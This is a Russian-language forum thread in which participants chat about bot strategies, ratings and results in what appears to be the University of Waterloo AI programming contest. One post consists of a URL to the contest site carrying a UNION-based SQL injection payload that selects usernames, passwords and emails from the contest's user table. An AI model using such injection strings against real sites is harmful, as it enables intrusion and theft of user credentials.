2 стратегии 8)) в одном флаконе !!! тока они пока глючат! ... чтоб отрабатывать по максимуму ситуации когда с противником возникла непроходимая стена
да нет просто задача максимального покрытия поля (когда мы разделены с противником) она совсем не похожа на то что я делаю.... думая над ходом! ... поэтому когда я остаюсь на чистом поле бот начинает тупить! да и чтото не понятное творится! .... Либо там с серверами чивото.... но очень мало игр, а общий рейтинг зависит и от общего количества игр (а они не растут!) Вот сейчас я сбросил счетчики... и все .... игроки закончились!
сегодня я экспериментирую!!! (буду часто сбрасывать счетчики) Для тех кто заинтересовался..... welcome!!! Могу оказать помощь в формировании алгоритма.... контест (настоящий начнется позже) этот контест для того чтобы .... выбирать стратегии! /threadnav176600-1-10.html
да мне пох 8)))) ... но на первом месте я был в течении получаса можно по РАНГ(обед 12-го)-у посмотреть 8)) (пока предварительные бои) ... мне просто обидно одни иностранцы .... а где русские! Статистику им порчу ФИНАЛЬНЫЕ БОИ 26-го февраля
http://csclub.uwaterloo.ca/contest/organization_profile.php?org_id=-1+union+select+null,concat_ws%28char%2832,124,32%29,username,password,email%29+from+contest2.contest_users+limit+2,1
откуда я знаю.... 8))) ! Google если выиграет американец могут и раззориться 8)) а иностранцам почетная грамота! Гыыыыыыыыы Там говорят уже и песню придумали ... посвящается всем гадам отнявшим победу у хозяина турнира универа Ватерлоу